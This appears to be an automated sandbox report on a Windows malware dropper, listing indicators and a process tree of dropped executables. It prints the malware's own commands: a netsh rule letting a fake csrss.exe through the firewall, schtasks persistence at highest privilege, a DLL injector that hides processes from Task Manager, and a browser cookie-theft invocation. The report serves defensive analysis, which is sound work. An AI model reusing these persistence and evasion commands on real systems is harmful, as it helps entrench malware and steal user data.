06130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	xdfNFkzClTc7L7WIyHuWo_Li.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeGraphics.exeGraphics.exe

pid	process
4788	pub2.exe
4788	pub2.exe
1824	Graphics.exe
1824	Graphics.exe
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
4464	Graphics.exe
4464	Graphics.exe
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3032
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4788 pub2.exe

pid	process
3032

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exeGraphics.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2696	SoCleanInst.exe
Token: SeCreateTokenPrivilege	3860	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3860	Install.exe
Token: SeLockMemoryPrivilege	3860	Install.exe
Token: SeIncreaseQuotaPrivilege	3860	Install.exe
Token: SeMachineAccountPrivilege	3860	Install.exe
Token: SeTcbPrivilege	3860	Install.exe
Token: SeSecurityPrivilege	3860	Install.exe
Token: SeTakeOwnershipPrivilege	3860	Install.exe
Token: SeLoadDriverPrivilege	3860	Install.exe
Token: SeSystemProfilePrivilege	3860	Install.exe
Token: SeSystemtimePrivilege	3860	Install.exe
Token: SeProfSingleProcessPrivilege	3860	Install.exe
Token: SeIncBasePriorityPrivilege	3860	Install.exe
Token: SeCreatePagefilePrivilege	3860	Install.exe
Token: SeCreatePermanentPrivilege	3860	Install.exe
Token: SeBackupPrivilege	3860	Install.exe
Token: SeRestorePrivilege	3860	Install.exe
Token: SeShutdownPrivilege	3860	Install.exe
Token: SeDebugPrivilege	3860	Install.exe
Token: SeAuditPrivilege	3860	Install.exe
Token: SeSystemEnvironmentPrivilege	3860	Install.exe
Token: SeChangeNotifyPrivilege	3860	Install.exe
Token: SeRemoteShutdownPrivilege	3860	Install.exe
Token: SeUndockPrivilege	3860	Install.exe
Token: SeSyncAgentPrivilege	3860	Install.exe
Token: SeEnableDelegationPrivilege	3860	Install.exe
Token: SeManageVolumePrivilege	3860	Install.exe
Token: SeImpersonatePrivilege	3860	Install.exe
Token: SeCreateGlobalPrivilege	3860	Install.exe
Token: 31	3860	Install.exe
Token: 32	3860	Install.exe
Token: 33	3860	Install.exe
Token: 34	3860	Install.exe
Token: 35	3860	Install.exe
Token: SeDebugPrivilege	2332	taskkill.exe
Token: SeManageVolumePrivilege	4772	md9_1sjm.exe
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeManageVolumePrivilege	4772	md9_1sjm.exe
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeDebugPrivilege	4464	Graphics.exe
Token: SeImpersonatePrivilege	4464	Graphics.exe
Token: SeTcbPrivilege	1888	svchost.exe
Token: SeTcbPrivilege	1888	svchost.exe
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032

Suspicious use of SetWindowsHookEx 22 IoCs

Processes:

xdfNFkzClTc7L7WIyHuWo_Li.exeDAXo_8j45JwReXyLq9COCJZ_.exe6KKo6k1apCeYUITcuYGhtDbH.exeXuWcMgieroS1v7hySTYG0dJv.exeCVz9dul4nsYUrZoXcsOyvEGs.exeVE6GWxFB5W6f2m4AzqXQm1Xm.exefR2Py6GrUGDwNvtUScPNhmO6.exeTlyUP3dq6PRVTzWqSiImv67D.exesjMARMVRFbL9N8ESXNFFQ1Xy.exe7LHK9.exekdA0UVbyNMNrbzDXkhEnvG3Z.exeInstall.exeWerFault.exe3GH57.exe3GH57.exeK7H1J.exeInstall.exeSPZ5yRkjqXYPisANHlNQrwi1.exeHJAGL.exeL1210LHJ08H6320.exe

pid	process
3988	xdfNFkzClTc7L7WIyHuWo_Li.exe
4668	DAXo_8j45JwReXyLq9COCJZ_.exe
4720	6KKo6k1apCeYUITcuYGhtDbH.exe
3324	XuWcMgieroS1v7hySTYG0dJv.exe
4016	CVz9dul4nsYUrZoXcsOyvEGs.exe
364	VE6GWxFB5W6f2m4AzqXQm1Xm.exe
2952	fR2Py6GrUGDwNvtUScPNhmO6.exe
224	TlyUP3dq6PRVTzWqSiImv67D.exe
1200	sjMARMVRFbL9N8ESXNFFQ1Xy.exe
2332	7LHK9.exe
2500	kdA0UVbyNMNrbzDXkhEnvG3Z.exe
544	Install.exe
2384	WerFault.exe
1368	3GH57.exe
1156	3GH57.exe
3664	K7H1J.exe
2616	Install.exe
2332	7LHK9.exe
1796	SPZ5yRkjqXYPisANHlNQrwi1.exe
3168	HJAGL.exe
3684	L1210LHJ08H6320.exe
3684	L1210LHJ08H6320.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exeFiles.exeInstall.execmd.exesvchost.exeGraphics.exeWerFault.execsrss.exeFile.exe

description	pid	process	target process
PID 376 wrote to memory of 2696	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	SoCleanInst.exe
PID 376 wrote to memory of 2696	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	SoCleanInst.exe
PID 376 wrote to memory of 4772	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	md9_1sjm.exe
PID 376 wrote to memory of 4772	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	md9_1sjm.exe
PID 376 wrote to memory of 4772	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	md9_1sjm.exe
PID 376 wrote to memory of 5052	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Folder.exe
PID 376 wrote to memory of 5052	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Folder.exe
PID 376 wrote to memory of 5052	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Folder.exe
PID 376 wrote to memory of 4464	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Graphics.exe
PID 376 wrote to memory of 4464	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Graphics.exe
PID 376 wrote to memory of 4464	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Graphics.exe
PID 376 wrote to memory of 432	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Updbdate.exe
PID 376 wrote to memory of 432	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Updbdate.exe
PID 376 wrote to memory of 432	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Updbdate.exe
PID 376 wrote to memory of 3860	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Install.exe
PID 376 wrote to memory of 3860	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Install.exe
PID 376 wrote to memory of 3860	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Install.exe
PID 376 wrote to memory of 2008	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Files.exe
PID 376 wrote to memory of 2008	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Files.exe
PID 376 wrote to memory of 2008	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	Files.exe
PID 376 wrote to memory of 4788	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	pub2.exe
PID 376 wrote to memory of 4788	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	pub2.exe
PID 376 wrote to memory of 4788	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	pub2.exe
PID 376 wrote to memory of 3740	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	File.exe
PID 376 wrote to memory of 3740	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	File.exe
PID 376 wrote to memory of 3740	376	43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe	File.exe
PID 2008 wrote to memory of 824	2008	Files.exe	jfiag3g_gg.exe
PID 2008 wrote to memory of 824	2008	Files.exe	jfiag3g_gg.exe
PID 2008 wrote to memory of 824	2008	Files.exe	jfiag3g_gg.exe
PID 3860 wrote to memory of 3364	3860	Install.exe	cmd.exe
PID 3860 wrote to memory of 3364	3860	Install.exe	cmd.exe
PID 3860 wrote to memory of 3364	3860	Install.exe	cmd.exe
PID 3364 wrote to memory of 2332	3364	cmd.exe	taskkill.exe
PID 3364 wrote to memory of 2332	3364	cmd.exe	taskkill.exe
PID 3364 wrote to memory of 2332	3364	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1824	2008	Files.exe	Graphics.exe
PID 2008 wrote to memory of 1824	2008	Files.exe	Graphics.exe
PID 2008 wrote to memory of 1824	2008	Files.exe	Graphics.exe
PID 1888 wrote to memory of 1824	1888	svchost.exe	Graphics.exe
PID 1888 wrote to memory of 1824	1888	svchost.exe	Graphics.exe
PID 1888 wrote to memory of 1824	1888	svchost.exe	Graphics.exe
PID 1824 wrote to memory of 1904	1824	Graphics.exe	WerFault.exe
PID 1824 wrote to memory of 1904	1824	Graphics.exe	WerFault.exe
PID 1904 wrote to memory of 5076	1904	WerFault.exe	netsh.exe
PID 1904 wrote to memory of 5076	1904	WerFault.exe	netsh.exe
PID 1824 wrote to memory of 3356	1824	Graphics.exe	csrss.exe
PID 1824 wrote to memory of 3356	1824	Graphics.exe	csrss.exe
PID 1824 wrote to memory of 3356	1824	Graphics.exe	csrss.exe
PID 1888 wrote to memory of 2752	1888	svchost.exe	schtasks.exe
PID 1888 wrote to memory of 2752	1888	svchost.exe	schtasks.exe
PID 3356 wrote to memory of 4992	3356	csrss.exe	injector.exe
PID 3356 wrote to memory of 4992	3356	csrss.exe	injector.exe
PID 3740 wrote to memory of 3828	3740	File.exe	nxyEzJj9EkK4D5RsMiczqZnF.exe
PID 3740 wrote to memory of 3828	3740	File.exe	nxyEzJj9EkK4D5RsMiczqZnF.exe
PID 3740 wrote to memory of 364	3740	File.exe	VE6GWxFB5W6f2m4AzqXQm1Xm.exe
PID 3740 wrote to memory of 364	3740	File.exe	VE6GWxFB5W6f2m4AzqXQm1Xm.exe
PID 3740 wrote to memory of 364	3740	File.exe	VE6GWxFB5W6f2m4AzqXQm1Xm.exe
PID 3740 wrote to memory of 3988	3740	File.exe	xdfNFkzClTc7L7WIyHuWo_Li.exe
PID 3740 wrote to memory of 3988	3740	File.exe	xdfNFkzClTc7L7WIyHuWo_Li.exe
PID 3740 wrote to memory of 3988	3740	File.exe	xdfNFkzClTc7L7WIyHuWo_Li.exe
PID 3740 wrote to memory of 4720	3740	File.exe	6KKo6k1apCeYUITcuYGhtDbH.exe
PID 3740 wrote to memory of 4720	3740	File.exe	6KKo6k1apCeYUITcuYGhtDbH.exe
PID 3740 wrote to memory of 4720	3740	File.exe	6KKo6k1apCeYUITcuYGhtDbH.exe
PID 3740 wrote to memory of 4668	3740	File.exe	DAXo_8j45JwReXyLq9COCJZ_.exe

C:\Users\Admin\AppData\Local\Temp\43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe
"C:\Users\Admin\AppData\Local\Temp\43ed72eb5dc3b3f69649f5f952162fb8d2903268635c0c970a5a5ec9c0abde42.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:376

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2696

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4772

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:5052

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 328
3⤵
- Program crash
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 352
3⤵
- Program crash
PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 352
3⤵
- Program crash
PID:2884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 660
3⤵
- Program crash
PID:3468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 660
3⤵
- Program crash
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 660
3⤵
- Program crash
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 660
3⤵
- Program crash
PID:1896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 740
3⤵
- Program crash
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 772
3⤵
- Program crash
PID:556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 708
3⤵
- Program crash
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 628
3⤵
- Program crash
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 872
3⤵
- Program crash
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 844
3⤵
- Program crash
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 660
3⤵
- Program crash
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 768
3⤵
- Program crash
PID:2560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 704
3⤵
- Program crash
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 824
3⤵
- Program crash
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 704
3⤵
- Program crash
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 916
3⤵
- Program crash
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 880
3⤵
- Program crash
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 716
3⤵
- Program crash
PID:1608

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 292
4⤵
- Program crash
PID:1572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 296
4⤵
- Program crash
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 296
4⤵
- Program crash
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 428
4⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 672
4⤵
- Program crash
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 676
4⤵
- Program crash
PID:2204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 700
4⤵
- Program crash
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 708
4⤵
- Program crash
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 728
4⤵
- Program crash
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 780
4⤵
- Program crash
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 724
4⤵
- Program crash
PID:2772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 676
4⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 848
4⤵
- Program crash
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 860
4⤵
- Program crash
PID:2116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 964
4⤵
- Program crash
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 708
4⤵
- Program crash
PID:3168

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:1904

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:5076

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 328
5⤵
- Program crash
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 352
5⤵
- Program crash
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 372
5⤵
- Program crash
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 664
5⤵
- Program crash
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 668
5⤵
- Program crash
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 668
5⤵
- Program crash
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 724
5⤵
- Program crash
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 740
5⤵
- Program crash
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 720
5⤵
- Program crash
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 808
5⤵
- Program crash
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 628
5⤵
- Program crash
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 880
5⤵
- Program crash
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 916
5⤵
- Program crash
PID:4052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 916
5⤵
- Program crash
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 916
5⤵
- Program crash
PID:2684

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 964
5⤵
- Program crash
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 984
5⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 984
5⤵
- Program crash
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 868
5⤵
- Program crash
PID:644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 1020
5⤵
- Program crash
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 948
5⤵
- Program crash
PID:2588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 944
5⤵
- Program crash
PID:3012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 1092
5⤵
- Program crash
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 1120
5⤵
- Program crash
PID:436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 1144
5⤵
- Program crash
PID:1624

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 996
5⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 1156
5⤵
PID:3816

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3364

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2332

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:432

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2008

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:824

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:1824

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4788

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3740

C:\Users\Admin\Pictures\Adobe Films\nxyEzJj9EkK4D5RsMiczqZnF.exe
"C:\Users\Admin\Pictures\Adobe Films\nxyEzJj9EkK4D5RsMiczqZnF.exe"
3⤵
- Executes dropped EXE
PID:3828

C:\Users\Admin\Pictures\Adobe Films\VE6GWxFB5W6f2m4AzqXQm1Xm.exe
"C:\Users\Admin\Pictures\Adobe Films\VE6GWxFB5W6f2m4AzqXQm1Xm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 464
4⤵
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 472
4⤵
PID:1904

C:\Users\Admin\Pictures\Adobe Films\xdfNFkzClTc7L7WIyHuWo_Li.exe
"C:\Users\Admin\Pictures\Adobe Films\xdfNFkzClTc7L7WIyHuWo_Li.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3988

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:1984

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:3140

C:\Users\Admin\Documents\SPZ5yRkjqXYPisANHlNQrwi1.exe
"C:\Users\Admin\Documents\SPZ5yRkjqXYPisANHlNQrwi1.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1796

C:\Users\Admin\Pictures\Adobe Films\laW4xJZsBO7dX0uDLfb3j0BF.exe
"C:\Users\Admin\Pictures\Adobe Films\laW4xJZsBO7dX0uDLfb3j0BF.exe"
5⤵
- Executes dropped EXE
PID:2920

C:\Users\Admin\Pictures\Adobe Films\wLGgERhIZuHW5EqmsFFGSx0x.exe
"C:\Users\Admin\Pictures\Adobe Films\wLGgERhIZuHW5EqmsFFGSx0x.exe"
5⤵
PID:5344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 624
6⤵
